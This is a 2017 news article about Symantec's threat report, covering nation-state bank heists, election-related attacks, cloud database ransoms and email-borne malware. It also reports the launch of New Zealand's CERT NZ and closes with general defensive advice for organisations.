by Divina Paredes

Nation states behind some of the largest heists carried out virtually over the past year

Apr 26, 2017
Big DataBusiness ContinuityCareers

The world saw specific nation states double down on political manipulation and straight sabotageKevin Haley, Symantec

Nation states, as well as organised criminals, are behind some of the largest heists that were carried out virtually over the past year, says Symantec.

The heists have netted billions of dollars for these groups, which Symantec believes will be used to help fund other covert and subversive activities.

While some of these attacks are the work of organised criminal gangs, for the first time nation states appear to be involved as well, say Symantec in its latest Internet Security Threat Report (ISTR).

Symantec says it has uncovered evidence linking North Korea to attacks on banks in Bangladesh, Vietnam, Ecuador and Poland.

“This was an incredibly audacious hack as well as the first time we observed strong indications of nation state involvement in financial cybercrime,” says Kevin Haley, director, Symantec Security Response.

“While their sights were set even higher, the attackers stole at least US$94 million.”

He says cybercriminals revealed new levels of ambition in 2016 – a year marked by extraordinary attacks, including multi-million dollar virtual bank heists and overt attempts to disrupt the US electoral process by state-sponsored groups.

“New sophistication and innovation are the nature of the threat landscape, but this year Symantec has identified seismic shifts in motivation and focus,” adds Kevin Haley, director, Symantec Security Response.

“The world saw specific nation states double down on political manipulation and straight sabotage. Meanwhile, cybercriminals caused unprecedented levels of disruption by focusing their exploits on relatively simple IT tools and cloud services.”

Symantec says cybercriminals are executing politically devastating attacks in a move to undermine a new class of targets.

It cites cyberattacks against the US Democratic Party and the subsequent leak of stolen information reflect a trend toward criminals employing highly-publicised, overt campaigns designed to destabilise and disrupt targeted organisations and countries.

While attacks involving sabotage have traditionally been quite rare, the perceived success of several campaigns – including the US election and Shamoon– point to a growing trend to criminals attempting to influence politics and sow discord in other countries, says Symantec.

NZ launches CERT

The New Zealand government, meanwhile, has launched CERT NZ, a cybersecurity unit to help Kiwis respond to online threats.

New Zealand is joining a large and sophisticated global network of CERTs, in which it will play an important role developing and executing best practice processes and systems to prevent and respond to cybersecurity incidents.

No caption

“Access to international best practice and threat information will increase our ability to protect our information and systems against cyberthreats. It will also enhance New Zealand’s reputation as a trusted business and security partner, which has benefits to our economy and our many businesses that rely on international trade,” says Communications Minister Simon Bridges.

No caption

CERT NZ was announced as part of Budget 2016, receiving $22.2 million of funding over four years. It will serve as the first place for New Zealanders to report a cyber incident.

The unit will sit at the centre of New Zealand’s cybersecurity architecture to deliver on five core functions of incident reporting, response coordination, readiness support, vulnerability identification and threat identification.

“We want to build a confident, secure and engaged online New Zealand as the ever-evolving digital world increasingly impacts on almost all aspects of our lives,” says Bridges.

“CERT NZ will make it easier for people at work and at home to understand, prevent and recover from cybersecurity incidents.”

No caption

Access to international best practice and threat information will increase our ability to protect our information and systems against cyberthreats.Communications Minister Simon Bridges

Cloud: The next frontier for cybercrime

Meanwhile, Symantec notes a growing reliance on cloud services has left organisations open to attacks.

Tens of thousands of cloud databases from a single provider were hijacked and held for ransom in 2016 after users left outdated databases open on the internet without authentication turned on.

Cloud security continues to challenge CIOs. According to Symantec data, CIOs have lost track of how many cloud apps are used inside their organisations.

When asked, most assume their organisations use up to 40 cloud apps when in reality the number nears 1000.

This disparity can lead to a lack of policies and procedures for how employees access cloud services, which in turn makes cloud apps riskier. These cracks found in the cloud are taking shape.

Symantec predicts that unless CIOs get a firmer grip on the cloud apps used inside their organisations, they will see a shift in how threats enter their environment.

Email as the weapon of choice

Symantec says in 2016, cybercriminals use PowerShell, a common scripting language installed on PCs, and Microsoft Office files as weapons.

While system administrators may use these common IT tools for daily management tasks, cybercriminals increasingly used this combination for their campaigns as it leaves a lighter footprint and offers the ability to hide in plain sight.

Due to the widespread use of PowerShell by attackers, 95 per cent of PowerShell files seen by Symantec in the wild were malicious.

The use of email as an infection point also rose, becoming a weapon of choice for cybercriminals and a dangerous threat to users.

Symantec found one in 131 emails contained a malicious link or attachment – the highest rate in five years.

Furthermore, business email compromise (BEC) scams, which rely on little more than carefully composed spear-phishing emails – scammed more than three billion dollars from businesses over the last three years, targeting over 400 businesses every day.

Ransomware continued to escalate as a global problem and a lucrative business for criminals.

Symantec says it has identified over 100 new malware families released into the wild, more than triple the amount seen previously, and a 36 per cent increase in ransomware attacks worldwide.

Symantec found one in 131 emails contained a malicious link or attachment – the highest rate in five years.

How to prepare for the worst

The Symantec report lists ways organisations can stay safe from cybercriminals.

Don’t get caught flat-footed: Use advanced threat intelligence solutions to help you find indicators of compromise and respond faster to incidents.

Prepare for the worst: Incident management ensures your security framework is optimised, measureable and repeatable, and that lessons learned improve your security posture. Consider adding a retainer with a third-party expert to help manage crises.

Implement a multi-layered defence: Implement a multi-layered defense strategy that addresses attack vectors at the gateway, mail server and endpoint. This also should include two-factor authentication, intrusion detection or protection systems (IPS), website vulnerability malware protection, and web security gateway solutions throughout the network.

Provide ongoing training about malicious email: Educate employees on the dangers posed by spear-phishing emails and other malicious email attacks, including where to internally report such attempts.

Monitor your resources: Make sure to monitor your resources and networks for abnormal and suspicious behavior, and correlate it with threat intelligence from experts.

Send news tips and comments to

Follow Divina Paredes on Twitter: @divinap

Sign up for CIO newsletters for regular updates on CIO news, views and events.

Join us on Facebook.